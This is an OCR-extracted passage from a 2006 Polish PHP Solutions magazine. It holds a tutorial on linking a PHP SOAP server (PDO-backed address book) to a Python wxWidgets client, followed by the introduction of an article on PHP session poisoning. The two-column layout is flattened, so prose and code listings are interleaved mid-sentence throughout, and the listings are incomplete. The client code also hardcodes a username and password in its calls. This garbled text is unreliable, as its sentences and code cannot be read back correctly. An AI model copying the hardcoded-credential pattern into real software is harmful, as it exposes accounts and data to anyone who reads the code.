Listing 5. Metody getOneEntry() oraz getAllEntries(), przekazujące odpowiednią
kwerendę do getDataFromSRC()
public function getOneEntry($userName,$pass,$id){
$query="SELECT * from book WHERE id=:id";
$entries=$this->getDataFromSRC($userName,$pass,$query,array('id'=>$id));
return $entries;
}
public function getAllEntries($userName,$pass){
$query="SELECT * from book";
...
Listing 6. addDataToSRC – metoda służąca dodawaniu nowych rekordów do ba-
zy oraz jej interfejs, addEntry()
private function addDataToSRC($userName,$pass,$data){
try{
$a=$this->checkConnection();
$a=$this->checkLogin($userName,$pass);
foreach($data as $i){
// iteruj wszystkie rzędy tablicy, które będą dodane (zwykle jest 1)
$a=$this->checkRequiredFields($i);
$stmt=$this->db->prepare("INSERT INTO book ".
...
}
// end of $i foreach
return $this->msgArray("OK_ADDED_DATA");
}catch (Exception $e){ return $this->handleExceptions
($e,"ERROR_ADD_FAILED"); }
}
public function addEntry($userName,$pass,$data){
$result=$this->addDataToSRC($userName,$pass,$data);
return $result;
}
private function checkRequiredFields($data,$action='add'){
if($action=='add') { $requiredFields=$this->requiredFields; }
if($action=='update') { $requiredFields=$this->requiredFieldsUpdate; }
foreach($requiredFields as $i){
if(!isset($data[$i])) { throw new Exception ('ERROR_BAD_DATA'); }
}
return true;
}
www.phpsolmag.org 65
2006-04-05, 12:21:24
 Projekty Mariaż Pythona i PHP

– dane przekazujemy przy użyciu publicz- Warto też zauważyć, że check- prywatną metodę deleteEntryFromSRC()
nej metody addEntry(), która przyjmuje ta- EntryExists() nie korzysta z metody (Listing 9) oraz publiczną deleteEntry().
kie same parametry, jak addDataToSRC(). getDataFromSRC() – jest to celowe, aby nie Metoda deleteEntryFromSRC() przyjmuje
wiązać prostej metody narzędziowej, jaką login, hasło oraz pojedyncze ID – pozwa-
Aktualizacja danych jest checkEntryExists(), z rozbudowaną la więc na skasowanie tylko jednego re-
Do aktualizacji rekordów naszej książ- metodą odczytu danych. Prawie identycz- kordu na raz, co jest celowe, gdyż zwięk-
ki teleadresowej posłuży metoda upda- nie, jak w przypadku addDataToSRC(), wy- sza bezpieczeństwo danych. Podobnie,
teDataInSRC() (Listing 7). Generalnie, gląda natomiast tworzenie prepared state- jak poprzednia metoda (updateDataIn-
większość jej kodu jest bardzo podobna ment, z jedną zasadniczą różnicą: tu uży- SRC()), deleteEntryFromSRC() sprawdza
do addDataToSRC(). Różnice pojawiają wamy polecenia SQL-owego UPDATE, a nie połączenie, zalogowanie i występowanie
się w przypadku zestawu wymaganych INSERT. Zwracanym przez tę funkcję komu- pozycji w tabeli bazodanowej, a następnie
pól – ten dla aktualizacji będzie zawierał nikatem o pomyślnym zakończeniu opera- sporządza i wykonuje prepared statement.
również ID rekordu i zostanie określony cji jest natomiast OK_UPDATED_DATA, a o nie- W przypadku powodzenia operacji meto-
w tablicy $this->requiredFieldsUpdate. powodzeniu – ERROR_UPDATE_FAILED. da zwraca OK_DELETED_DATA, a w razie nie-
Drugą istotną różnicą jest to, że Podobnie, jak addDataToSRC(), update- powodzenia – ERROR_DELETE_FAILED.
updateDataInSRC() sprawdza przy po- DataInSRC() ma metodę publiczną, która Nasz silnik jest gotowy. Zapiszmy go
mocy metody checkEntryExists() (Li- ją wywołuje (updateEntry()). w pliku bookengine.php.
sting 8), czy aktualizowany rekord wystę-
puje w tabeli bazodanowej book. Jeżeli Kasowanie danych Tworzymy interfejs
takowy nie istnieje, wyrzucany jest wyją- Czas na ostatnią operację bazodanową: silnik – SOAP
tek z komunikatem ERROR_NO_ENTRY. kasowanie danych. Stworzymy w tym celu Czas na interfejs silnik-SOAP. Jak już wie-
my, jego zadaniem będzie przekształcanie
Listing 7. updateDataInSRC – aktualizacja danych w bazie danych pomiędzy tablicą a XML-em oraz
ich przesyłanie pomiędzy klientem a silni-
private function updateDataInSRC($userName,$pass,$data){ kiem. W tej dziedzinie nigdy nie możemy
try{ na 100% zaufać w solidność bibliotek po
$a=$this->checkConnection();
drugiej stronie, gdyż są one często w wer-
$a=$this->checkLogin($userName,$pass);
foreach($data as $i){ sji rozwojowej. Użycie XML-a chroni nas
// check, whether each row contains the correct data przed wszelkimi niekompatybilnościami.
$a=$this->checkRequiredFields($i,'update'); Zaczniemy od utworzenia klasy
$a=$this->checkEntryExists($userName,$pass,$i['id']); interface_SOAP (Listing 10), która będzie
$stmt=$this->db->prepare("UPDATE book SET ".
główną klasą interfejsu silnik-SOAP i bę-
...
} dzie udostępniana w ramach komunikacji
return $this->msgArray("OK_UPDATED_DATA"); SOAP (o tym zaraz). Na początku usta-
}catch (Exception $e){ return $this->handleExceptions($e, limy dwie zmienne publiczne: $book (in-
"ERROR_UPDATE_FAILED"); } stancja naszego silnika) oraz $msg (komu-
}
nikat o połączeniu z silnikiem). Następnie
public function updateEntry($userName,$pass,$data){
$result=$this->updateDataInSRC($userName,$pass,$data); przejdziemy do konstruktora: utworzymy
return $result; w nim instancję klasy bookengine, oraz
} obiekt klasy XML_Array, służącej do kon-
wersji danych między tablicą a formatem
Listing 8. checkEntryExists – sprawdzanie, czy rekord tabeli istnieje
XML. W artykule nie omówimy tej klasy
public function checkEntryExists($userName,$pass,$id){ – jej kod źródłowy (podobnie jak kod ca-
$query="SELECT * from book WHERE id=:id"; łej aplikacji) znajduje się na naszej stro-
try{ nie WWW.
$a=$this->checkConnection();
Teraz wystarczy wczytać komunikat
$a=$this->checkLogin($userName,$pass);
$stmt=$this->db->prepare($query);
z silnika (getMsg())– jeżeli został zmieniony,
.... to silnik został zainicjowany prawidłowo.
$resultArray=$stmt->fetchAll(PDO::FETCH_ASSOC); Następne metody: getOneEntry(),
} getAllEntries(), addEntry(), update-
Entry() oraz deleteEntry() odpowiada-
catch (Exception $e){ throw new Exception("ERROR_NO_CONNECTION"); }
ją metodom klasy bookengine. Ich zada-
// jeżeli operacje bazodanowe były OK, ale nie znaleziono pozycji, niem jest jedynie konwersja formatu da-
// wyrzuć wyjątek z komunikatem ERROR_NO_ENTRY. Zostanie on przejęty przez nych (tablica<->XML) pomiędzy silnikiem
// metodę wywołującą, nie przez tę, w której jesteśmy a klientem. Odbywa się to przy użyciu me-
if($resultArray==array()) { throw new Exception ("ERROR_NO_ENTRY"); }
tod retArrayToXML() (tablica -> XML) oraz
else { return true; }
retXMLToArray() (XML -> tablica) klasy
}
XML_Array. Zapiszmy teraz gotową kla-
sę w pliku todoserver.php i udostępnij-

66 www.phpsolmag.org PHP Solutions Nr 3/2006

62_63_64_65_66_67_68_69_70_71_Python_PL.indd 66 2006-04-05, 12:21:25

 Mariaż Pythona i PHP Projekty

my ją klientom łączącym się przez SOAP. import SOAPpy,sys,copy Przetwarzanie XML-a

W tym celu utworzymy instancję $x klasy import xml.dom.minidom Teraz – podobnie, jak to miało miejsce
SoapServer. Następnie używając meto- po stronie serwera – stworzymy metody
dy setClass() obiektu $x wybieramy kla- Tutaj też utworzymy klasę interface_soap, odpowiadające za konwersję XML-a na
sę interface_SOAP do udostępnienia, któ- która w przeciwieństwie do interface_SOAP tablicę (retXMLToArray()) i vice versa (ret-
re rozpoczniemy przy pomocy handle(). z PHP będzie obsługiwała stronę klienc- ArrayToXML()). Wykorzystamy w tym celu
Nasza praca po stronie serwera została ką. Zacznijmy od konstruktora (metoda klasę xml.dom.minidom oraz rozszerzenia
zakończona. __init__(), Listing 11). Inicjalizujemy pyxml. Nie omówimy tych metod w artyku-
w nim klienta SOAP – klasę SOAPProxy le – ich kod źródłowy, podobnie jak klasy
Ujarzmianie Pythona: z modułu SOAPpy (który musi być wcze- PHP-owej XML_Array, znajduje się na na-
tworzymy aplikację śniej zainstalowany) i przekazujemy jej szej stronie WWW.
kliencką konstruktorowi URL serwera SOAP. Ope-
A więc doszliśmy do tworzenia aplikacji rację tę wykonujemy w bloku try..except, Korzystanie z metod PHP-owych
klienckiej w Pythonie. Utworzymy plik bo- odpowiadającym blokowi try..catch w Pythonie
ok_client.py i zaczniemy od zaimportowa- w PHP: except zbiera wyrzucone wyjątki. Nadszedł czas na zdefiniowanie metod,
nia potrzebnych modułów: za pomocą których będziemy wywoływa-
li metody PHP-owe. Nadamy im takie sa-
Listing 9. deleteDataFromSRC – kasowanie danych z bazy me nazwy, jak w PHP. Zastosujemy nawet
identyczne nazwy argumentów, z wyjąt-
private function deleteDataFromSRC($userName,$pass,$id){ kiem pass, gdyż jest to słowo zastrzeżone.
try{ Zacznijmy od getOneEntry() (Listing 12).
$a=$this->checkConnection();
Jej kod umieścimy w bloku try..except.
$a=$this->checkLogin($userName,$pass);
$a=$this->checkEntryExists($userName,$pass,$id); Zaczniemy od odczytania XML-a z serwe-
$stmt=$this->db->prepare("DELETE FROM book WHERE id=:id"); ra. Tutaj właśnie widzimy, jak używać me-
... tod PHP-owych: są one po prostu meto-
dami obiektu self.server! Proste, praw-
Listing 10. interface_SOAP – główna klasa interfejsu silnik-SOAP
da? Po odczytaniu danych przekształca-
class interface_SOAP{ my je na tablicę (self.retXMLToArray())
public $book; // instancja silnika i zwracamy. I tu uwaga: nie zwracamy sa-
public $msg='initial message: not connected yet'; mych danych, tylko ich kopię (copy.deep-
public function __construct(){
copy(data)) – jest to koniecznie, gdyż do-
$this->book=new bookListEngine();
$this->xarr=new XML_Array();
myślnie Python nie kopiuje tablicy, tylko
$this->msg=$this->book->getMsg(); tworzy wskaźnik do niej, co mogłoby naro-
} bić poważnych szkód.
public function getMsg(){ return $this->msg; } Analogicznie radzimy sobie z pozo-
public function getOneEntry($userName,$pass,$id){
stałymi metodami dostępu do danych:
$data=$this->book->getOneEntry($userName,$pass,$id);
getAllEntries(), addEntry(), update-
$dataXML=$this->xarr->retArrayToXML($data);
return $dataXML; Entry() oraz deleteEntry() – na Listin-
} gu 13 przedstawiamy pierwsze wersy ich
public function getAllEntries($userName,$pass){ deklaracji.
$data=$this->book->getAllEntries($userName,$pass);
Część naszej aplikacji klienckiej odpo-
...
}
wiedzialna za dostęp do danych jest już
public function addEntry($userName,$pass,$dataXML){ gotowa. Pora na interfejs graficzny (GUI).
$data=$this->xarr->retXMLToArray($dataXML);
$result=$this->book->addEntry($userName,$pass, $data['data_rows']); Tworzymy interfejs
...
}
graficzny w Pythonie
public function updateEntry($userName,$pass,$dataXML){
Będzie on wyglądał jak na Rysunku 2.
... Mamy mieć możliwość przeglądania listy
$result=$this->book->updateEntry($userName,$pass,$data['data_rows']); rekordów książki teleadresowej i wyświe-
... tlania wybranej pozycji. Chcemy też móc
}
dodawać nowe wpisy, a także kasować
public function deleteEntry($userName,$pass,$id){
$result=$this->book->deleteEntry($userName,$pass,$id);
i modyfikować istniejące. Do tych ostatnich
... czynności posłużą nam okna dialogowe.
}
} // koniec klasy interface_SOAP Tworzymy lokalny model danych
$x=new SoapServer(null,array('uri'=>'http://localhost/php/'));
Do tego jednakże potrzebujemy lokalnego
$x->setClass("interface_SOAP");
$x->handle();
modelu danych. Nie chcemy przecież łą-
czyć się z bazą danych za każdym razem,
gdy np. przechodzimy do kolejnej pozy-

PHP Solutions Nr 3/2006 www.phpsolmag.org 67

62_63_64_65_66_67_68_69_70_71_Python_PL.indd 67 2006-04-05, 12:21:27

 Projekty Mariaż Pythona i PHP

cji na liście. Nie chcemy również umiesz-

Listing 11. Konstruktor klasy interface_soap w Pythonie czać operacji na lokalnych danych w kla-
sie interface_soap, gdyż jej celem jest
def __init__(self):
try: wyłącznie pośredniczenie w komunika-
self.server = SOAPpy.SOAPProxy("http://localhost/php/todoserver.php") cji SOAP.
except: Stworzymy więc nową klasę, którą na-
print "ERROR: can not connect to server" zwiemy tempDataModel (chwilowy model
sys.exit()
danych, Listing 14). Jej głównym celem
Listing 12. getOneEntry w interface_soap: używanie metod PHP-owych będzie pobieranie danych z bazy (przy
w Pythonie pomocy klasy interface_soap) i przecho-
wywanie ich w tablicy dataTemp, z której
def getOneEntry(self,userName,password,id):
będziemy mogli je pobierać przy użyciu
try:
dataXML=self.server.getOneEntry(userName,password,id)
metod getTempEntry() (odczyt jednego
data=self.retXMLToArray(dataXML) rekordu) oraz getAllTempData() (odczyta-
return copy.deepcopy(data) nie całej tablicy). Do odczytu danych z ba-
... zy używamy metody reloadData(), a do
wyzerowania i odświeżenia całego mode-
Listing 13. Deklaracje pozostałych metod dostępu do danych w Pythonie
lu danych – resetTempDataModel(). Klasa
def getOneEntry(self,userName,password,id): pośredniczy również w kasowaniu (dele-
def getAllEntries(self,userName,password): teEntryFromDB()), dodawaniu (addEntry-
def addEntry(self,userName,password,data): ToDB()) oraz aktualizacji (updateEntry-
def updateEntry(self,userName,password,data):
InDB()) danych w bazie, za każdym ra-
def deleteEntry(self,userName,password,id):
zem powodując ponowny odczyt danych
Listing 14. Lokalny (chwilowy) model danych w Pythonie z tabeli book oraz wyzerowanie i odświeże-
nie zawartości tablicy dataTemp. Podczas
class tempDataModel: resetowania danych sprawdzamy ich po-
def __init__(self):
prawność. Gotową klasę modelu danych
self.dataInterface=interface_soap()
self.resetTempDataModel() zapiszemy w pliku tempdatamodel.py.
def reloadData(self): Wróćmy teraz do konstruowania inter-
# metoda prywatna fejsu graficznego.
return self.dataInterface.getAllEntries('critto','1qazse4')
def resetTempDataModel(self):
# metoda publiczna
Budujemy główną część
dataTMP0=self.reloadData() aplikacji
self.dataTemp={} Tworzenie interfejsu graficznego rozpocz-
try: niemy od zainicjowania głównego okna
... aplikacji – instancji mainF klasy wx.Frame
if(dataTMP0['data_type']=='entries'):
(Listing 15). Zauważmy, że konstruujemy
for i in dataTMP0['data_rows']:
id=i['id'] ten obiekt wewnątrz metody OnInit() kla-
self.dataTemp[str(id)]=i sy MainModule, która dziedziczy z wx.App
# porządkowanie self.dataTemp wg ID wersu danych – blok ten musi istnieć w każdej aplika-
self.Errors=0 cji korzystającej z wxWidgets. Późniejsze
else:
utworzenie obiektu klasy MainModule()
...
def getAllTempData(self): oraz wywołanie jej metody MainLoop()
return copy.deepcopy(self.dataTemp) również jest niezbędne, gdyż otwiera
def getTempEntry(self,id): główną pętlę działania aplikacji wxWid-
try: gets – chcąc nie chcąc, musimy więc
if not(self.getErrors()):
w niej zawrzeć całą logikę programu.
return copy.deepcopy(self.dataTemp[str(id)]) # to MUSI być łańcuch
... Zaczniemy od konstruktora tej klasy
def deleteEntryFromDB(self,id): (__init__(), Listing 16), w którym naj-
a=self.dataInterface.deleteEntry('critto','1qazse4',id) pierw zainicjujemy klasę nadrzędną,
self.resetTempDataModel() a następnie zadeklarujemy kilka wła-
return copy.deepcopy(a)
ściwości obiektu: listy pól wymaga-
def addEntryToDB(self,data):
# implikuje tylko jeden rekord nych self.requiredFieldsAll i self.
dataOK={'data_type':'entries','data_rows':[data]} requiredFieldsList, numer na liście
result=self.dataInterface.addEntry('critto','1qazse4',dataOK) oraz ID wybranej pozycji (self.entry-
... Selected i self.entrySelectedID) oraz
def updateEntryInDB(self,data,id):
zdefiniujemy model danych (dataModel).
... # analogicznie jak addEntryToDB
Ze względu na konstrukcję wxWid-
gets, okno (wx.Frame) musi zawierać

68 www.phpsolmag.org PHP Solutions Nr 3/2006

62_63_64_65_66_67_68_69_70_71_Python_PL.indd 68 2006-04-05, 12:21:28

 Mariaż Pythona i PHP Projekty

panel (wx.Panel), na którym będą roz- Potem przejdziemy do umieszczania mi, które oszczędzają nam podawania po-
mieszczone kolejne elementy, takie jak obiektów: przycisków self.buttons['Add'], zycji i rozmiarów obiektów w pikselach.
np. lista przewijana (wx.ListCtrl), przy- Edit i Remove, pola tekstowego, na którym Mechanizm podobny do sizerów, tyle że
ciski (wx.Button) czy pole tekstowe będziemy wyświetlali zawartość rekordu zastosowany w GTK, tzw. boksy (ang. bo-
(wx.TextCtrl), w którym będziemy wy- (obiekt self.dataScreen klasy TextCtrl) xes) zostały omówione w artykułach Wake
świetlać dane wybranego rekordu Przej- oraz listy przewijalnej, self.bookList klasy on Lan (numer 2/2005), Nowe możliwo-
dziemy więc do tworzenia głównego pa- bookListCtrl (szczegóły jej działania omó- ści PHP-GTK2 (numer 1/2006) oraz Gla-
nelu aplikacji. Utworzymy w tym celu kla- wimy później). de GUI Builder (numer 2/2006). Jednym
sę MainPanel, która będzie dziedziczyła Czas na ułożenie obiektów w oknie z najprostszych sizerów jest wx.BoxSizer,
z wx.Panel. – służą do tego narzędzia zwane sizera- który automatycznie rozmieszcza kolejne
obiekty poziomo (wx.HORIZONTAL) albo pio-
nowo (wx.VERTICAL). Skorzystamy z nie-
Listing 15. Główna pętla aplikacji wxWidgets
go, aby rozlokować obok siebie przyciski
class mainModule(wx.App): (sizerBtn).
def OnInit(self): Następnie utworzymy sizer, za pomo-
mainF=wx.Frame(None,-1,'Książka teleadresowa',) cą którego rozmieścimy wszystkie obiekty
mainF.SetSize((640,480))
w naszym oknie – w tym również inne si-
a=mainPanel(mainF,-1)
mainF.Show(True) zery, takie jak sizerBtn. Tym razem uży-
return True jemy narzędzia wx.RowColSizer, które po-
zwala na rozlokowanie obiektów w komór-
x_pim=mainModule(0) kach tabeli. Utworzymy obiekt sizerP. Ko-
x_pim.MainLoop()
lumny i wersy tej tabeli możemy łączyć
Listing 16. Konstruktor klasy MainPanel – tworzenie i porządkowanie zawartości (colspan i rowspan). Przy pomocy metody
głównego okna aplikacji SetItemMinSize() tej klasy ustalimy z ko-
lei minimalny rozmiar wybranych obiektów,
class mainPanel(wx.Panel): zaś metoda SetSizerAndFit samego pa-
def __init__(self,parent,id):
nelu pozwoli nam umieścić sizer w oknie.
wx.Panel.__init__(self,parent,id)
self.requiredFieldsAll=['name','surname','phone','mobile','email','www',\ Pora na powiązanie zdarzeń (ang.
'gg','aim','icq','notes','address','postal'] events) dotyczących utworzonych obiek-
... tów z metodami callbackowymi (ang. cal-
buttons={} lback methods), w których zawarta bę-
buttons['Add'] =wx.Button(self,-1,"Add")
dzie obsługa tych zdarzeń. Powiązania te
...
self.dataScreen=wx.TextCtrl(self,-1,style=wx.TE_MULTILINE) opisujemy za pomocą specjalnych kon-
self.dataScreen.SetEditable(False) strukcji językowych: w przypadku wybo-
self.bookList=bookListCtrl(self,-1) ru oraz anulowania wyboru elementu li-
self.sizerBtn=wx.BoxSizer(wx.HORIZONTAL) sty użyjemy wx.EVT_LIST_ITEM_SELECTED
...
oraz wx.EVT_LIST_ITEM_DESELECTED, a dla
#self.sizer=wx.lib.rcsizer.RowColSizer()
self.sizerP=wx.lib.rcsizer.RowColSizer() przycisków zastosujemy wx.EVT_BUTTON.
self.sizerP.Add(self.dataScreen,row=0,col=0,colspan=4,rowspan=3,flag=wx.EXPAND) Została jeszcze jedna operacja: wy-
... wołanie nieutworzonej jeszcze metody
wx.EVT_LIST_ITEM_SELECTED(self,self.bookList.GetId(),self.entryIsSelected) populateBookList(), która będzie służyła
wx.EVT_LIST_ITEM_DESELECTED(self,self.bookList.GetId(),self.entryIsDeselected)
do wypełnienia listy danymi.
wx.EVT_BUTTON(self,buttons['Add'].GetId(),self.addClicked)
... Zanim jednak przejdziemy do tworze-
self.populateBookList() nia tych metod, zbudujmy element, bez
którego nasz interfejs jest bezużyteczny:
Listing 17. bookListCtrl, obiekt listy przewijanej (booklistctrl.py) listę przewijaną.
class bookListCtrl(wx.ListCtrl,wx.lib.mixins.listctrl.ColumnSorterMixin):
def addToList(self,dataFields,moreData=-2): Lista przewijana
lastIndex=self.GetItemCount() # indeks dodawanej pozycji Lista przewijana to obiekt klasy
self.InsertStringItem(lastIndex,str(lastIndex)) wx.ListCtrl. My odziedziczymy tę kla-
for i in range(0,len(dataFields)):
sę tworząc bookListCtrl (Listing 17), aby
self.SetStringItem(lastIndex,i+1,dataFields[i])
...
zorganizować listę po swojemu.
def __init__(self,parent,id): Zacznijmy od jej konstruktora. Wsta-
wx.ListCtrl.__init__(self,parent,id,style=wx.LC_REPORT|wx.SUNKEN_BORDER) wimy w nim kolumny listy (metoda
self.InsertColumn(0,'Nr') InsertColumn()), kolejno: numer pozy-
...
cji, imię, nazwisko, telefon, telefon ko-
wx.lib.mixins.listctrl.ColumnSorterMixin.__init__(self,6)
mórkowy oraz e-mail, a także doda-
my narzędzie umożliwiające sortowanie
(ColumnSorterMixin), które wymaga po-

PHP Solutions Nr 3/2006 www.phpsolmag.org 69

62_63_64_65_66_67_68_69_70_71_Python_PL.indd 69 2006-04-05, 12:21:30

 Projekty Mariaż Pythona i PHP

dania liczby kolumn, których będzie do-

Listing 18. Metody callbackowe klasy mainPanel oraz metody: populate- tyczył. Niestety, na tym jego wymagania
BookList() i showEntryData()
się nie kończą – musimy także zdefinio-
def showEntryData(self,entryIndex): wać metodę GetListCtrl(), która bę-
if(self.entrySelected!=-1)and(self.entrySelectedID!=-1): dzie zwracała obiekt klasy wx.ListCtrl
dataEntry=self.dataModel.getTempEntry(str(self.entrySelectedID)) (u nas bookListCtrl), a także tablicę
self.dataScreen.SetValue(str(dataEntry)) (słownik) itemDataMap (wszystkie na-
string_out="imię : "+dataEntry['name'] +" nazwisko:"+\
zwy muszą się zgadzać), w której bę-
dataEntry['surname']+"\n"+\
... dzie przechowywana kopia kompletu
self.dataScreen.SetValue(string_out) danych do tablicy.
Utworzymy także metodę clearList(),
def entryIsSelected(self,evt): która będzie kasowała listę korzysta-
iSelected=evt.GetIndex()
jąc z wbudowanej do wx.ListCtrl meto-
self.entrySelected=iSelected
self.entrySelectedID=self.bookList.GetItemData(iSelected) dy DeleteAllItems() oraz przypisując pu-
self.showEntryData(iSelected) sty słownik do itemDataMap. Ostatnią po-
def entryIsDeselected(self,evt): trzebną nam metodą będzie addToList()
... – dodawanie nowej pozycji do listy. Sko-
rzystamy w niej z wbudowanej meto-
def removeClicked(self,evt):
if self.entrySelected!=-1: dy GetItemCount(), aby sprawdzić ilość
a=wx.MessageDialog(self, 'Czy skasować wybraną pozycję z bazy danych?',\ pozycji i ustalić indeks dodawanej. Do-
'Usuwanie wpisu',wx.YES_NO|wx.ICON_INFORMATION) dawanie rekordu będzie się odbywało
a1=a.ShowModal() przy użyciu metod InsertStringItem()
if(a1==wx.ID_YES):
oraz SetStringItem(). Następnie użyje-
result=self.dataModel.deleteEntryFromDB(self.entrySelectedID)
self.populateBookList() my SetItemData() do wstawienia niewi-
... docznych danych każdej pozycji (w na-
def addClicked(self,evt): szym przypadku id w tabeli bazodanowej
a=editionDialog(self,-1,title="Dodawanie nowej pozycji") book), a także zdefiniujemy nowy element
a1=a.ShowModal()
itemDataMap. Klasa bookListCtrl jest go-
if(a1==wx.ID_OK):
data=a.getAllData() towa – zapiszemy ją w pliku booklistctrl.py.
result=self.dataModel.addEntryToDB(data)
self.populateBookList() Metody callbackowe
... Przejdźmy teraz do tworzenia metod cal-
def editClicked(self,evt):
lbackowych klasy mainPanel (Listing 18).
if self.entrySelectedID!=-1:
chosenEntryID=self.entrySelectedID Każda z nich ma argument evt – za je-
chosenEntry=self.dataModel.getTempEntry(chosenEntryID) go pomocą przekazywane są informacje o
a=editionDialog(self,-1,title="Dodawanie nowej pozycji") zdarzeniu. Pierwszą z naszych metod call-
a.setAllData(chosenEntry) backowych jest entryIsSelected(), wywo-
...
ływana przy wybraniu pozycji na liście, któ-
def populateBookList(self): rą odczytujemy korzystając z GetIndex().
self.bookList.clearList() Za pomocą entryIsSelected() ustalamy
gottenData=self.dataModel.getAllTempData() wybrany element (self.entrySelected
for i in gottenData: # i=id i self.entrySelectedID) oraz wyświetlamy
dataValues=[]
go w polu tekstowym (showEntryData()).
...
Z kolei metoda entryIsDeselected(),
Listing 19. Dialog pozwalający na edycję danych wybranego rekordu wywoływana w przypadku anulowa-
nia wyboru pozycji (np. poprzez kliknię-
class editionDialog(wx.Dialog):
cie na pustą część listy) będzie nadawa-
def setAllData(self,data):
ła zmiennym self.entrySelected oraz
...
def getAllData(self)): self.entrySelectedID wartość -1.
... Następnymi metodami callbac-
kowymi są te reagujące na kliknię-
def __init__(self,parent,id,pos=wx.DefaultPosition,size=((300,200)),title=''):
cie: removeClicked(), addClicked()
wx.Dialog.__init__(self,parent,id,title,pos,size) # inicjalizacja dialogu
i updateClicked(). W ich przypadku
self.sizer=wx.lib.rcsizer.RowColSizer()
... ukazuje się okienko dialogowe, w któ-
labels['name'] =wx.StaticText(self,-1,'Name') rym użytkownik może odpowiednio: za-
... decydować, czy chce skasować po-
self.buttonOK=wx.Button(self,wx.ID_OK,'Accept')
zycję (removeClicked()), wpisać da-
...
ne nowego rekordu (addClicked())
lub wyedytować wartości istniejącego

70 www.phpsolmag.org PHP Solutions Nr 3/2006

62_63_64_65_66_67_68_69_70_71_Python_PL.indd 70 2006-04-05, 12:21:32


Rysunek 2. Gotowy interfejs użytkownika
(editClicked). W pierwszym przypadku
okienkiem dialogowym jest obiekt klasy
wx.MessageDialog wyświetlający komu-
nikat: w dwóch pozostałych korzystamy
z instancji własnej klasy editionDialog,
którą omówimy później. W każdej spo-
śród tych metod dialog jest wywoływany
modalnie (ShowModal()), co oznacza, że
dopóki jest na ekranie, możliwość ko-
rzystania z pozostałych elementów na-
szej aplikacji jest zablokowana. Każdy
dialog ma przyciski (w przypadku ka-
sowania są to TAK i NIE, w pozostałych
– OK i Anuluj). Zwróćmy uwagę na spo-
sób reagowania na ich kliknięcie: po za-
mknięciu dialogu sprawdzamy zwróco-
ną wartość.
Metody removeClicked, addClicked
i editClicked() korzystają z mode-
lu danych: pierwsza z nich kasuje pozy-
cję tabeli bazodanowej book przy użyciu
dataModel.deleteEntryFromDB(). W dru-
giej uzywamy metody addEntry() tej sa-
mej klasy, a w trzeciej – updateEntry().
Każda z tych metod odświeża następnie
R E
PHP Solutions Nr 3/2006
62_63_64_65_66_67_68_69_70_71_Python_PL.indd 71
Mariaż Pythona i PHP
zawartość tabeli bazodanowej (populate-
BookList()).
Przyjrzyjmy się teraz populate-
BookList(). Na początku, metoda ta czy-
ści listę (self.bookList.clearList())
i pobiera wszystkie dane przechowywa-
ne w lokalnym modelu danych, które na-
stępnie dodaje do listy. Główna częśc in-
terfejsu naszej aplikacji jest już gotowa,
zapiszmy ją więc w pliku gui_main.py.
Dialog dodawania i edycji
rekordów
Ostatnim elementem naszego interfej-
su graficznego jest dialog pozwalają-
cy nam wpisywać dane wybranej po-
zycji książki teleadresowej. Ma on po-
stać klasy editionDialog, która dziedzi-
czy z wx.Dialog (Listing 19). W konstruk-
torze tej klasy definiujemy i ustawiamy
(za pomocą sizerów) etykiety (wx.Sta-
ticText) i pola danych (wx.TextCtrl)
oraz przyciski OK i Anuluj. Potrzebuje-
my jeszcze metod pozwalających na po-
bieranie wpisanych danych z pól edycyj-
K L A M
www.phpsolmag.org
Projekty
nych oraz na ich umieszczanie. Nazwie-
my je getAllData() i setAllData() – bę-
dą one korzystały z metod getValue()
i setValue() każdego pola (w pętli for).
Gotowy dialog zapiszemy w pliku edition-
dialog.py.
Tym samym zakończyliśmy tworzenie
naszego interfejsu graficznego – możemy
go uruchomić.
Podsumowanie
Jak widać, zaprzęgnięcie PHP i Pythona
w celu wykonywania wspólnego zada-
nia jest proste i daje zadziwiające rezul-
taty: stronę serwerową obsługuje potęż-
ny, a zarazem prosty skrypt PHP, nato-
miast Python świetnie sprawdza się przy
tworzeniu interfejsu graficznego. Istnie-
je idealny podział pracy pomiędzy model
danych, a ich prezentację. Takiego połą-
czenia można dokonać również między
PHP a dowolnym innym językiem, np.
Javą, do czego Was zresztą serdecz-
nie zachęcamy. Dzięki protokołom takim,
jak SOAP czy XML-RPC świat PHP stoi
otworem dla innych rozwiązań. 
O autorze
Krzysztof Sobolewski od wielu lat zaj-
muje się programowaniem, głównie w
PHP i Pythonie. Do jego ulubionych dzie-
dzin należą: bazy danych, interfejsy gra-
ficzne i algorytmy rekurencyjne. Poza
tym redaguje magazyn PHP Solutions,
bierze udział w tworzeniu polskiej Wiki-
pedii i pisze eseje na różne tematy.
Kontakt z autorem:
krzysztof.sobolewski@gmail.com
A
71
2006-04-05, 12:21:34
Bezpieczeństwo

Techniki zatruwania sesji

w PHP
Stopień trudności: lll
Jakub Mrugalski

Słyszałeś o przechwytywaniu i modyfikowaniu

zmiennych POST, GET i COOKIES i myślisz,
że wystarczy zamiast nich korzystać z sesji,
aby odgrodzić się murem od niebezpieczeństw.
Rzeczywistość jest jednak znacznie gorsza: to
co wydaje się być ścianą warowni, jest zaledwie
ukrywającym zagrożenia przed użytkownikiem
parawanem, który bardzo łatwo naruszyć.

W SIECI
1. http://www.phpsec.org
– PHP Security Consortium
2. http://www.hardened-
php.net/
– PHP Security Project
3. http://www.sitepoint.com/
article/php-security-blunders
– Top 7 security blunders
4. http://www.acros.si/papers/
session_fixation.pdf
– session fixation
O
d kiedy zetknąłem się z języ-
kiem PHP (a było to wiele lat
temu), nieustannie zwracano mi
uwagę, że zwykle każda zmienna global-
na może bez większych problemów być
modyfikowana przez użytkownika. Dla-
tego początkujący oraz średniozaawan-
sowani programiści stosują prostą re-
gułę, która zabrania przesyłania zmien-
nych odpowiedzialnych np. za rozpozna-
wanie zalogowania użytkownika przy po-
mocy metod POST i GET. W przypad-
ku GET, poufne informacje widoczne są
w pasku adresu, natomiast przy stoso-
waniu trochę bezpieczniejszej POST, zo-
baczymy je np. w kodzie przesyłanego
formularza – agresor może więc taki for-
mularz spreparować.
Lepsze kursy PHP polecają, aby da-
ne dotyczące logowania przetrzymy-
wać w ciasteczkach (ang. cookies). Jed-
nak należy pamiętać, że nie bronimy na-
szych skryptów przed szarymi użytkow-
nikami, lecz przed wprawnymi włamy-
waczami, dla których modyfikacja cia-
steczek nie stanowi najmniejszego pro-
blemu.
Niebezpieczeństwa
płynące z sesji
Każdy zaawansowany programista PHP
wie, że gdy włączymy Register Globals,
zmienne sesyjne (SESSION) mają więk-
szy priorytet niż zmienne typu POST,
GET, czy COOKIES. W praktyce ozna-
cza to, że jeśli w skrypcie zadeklarujemy
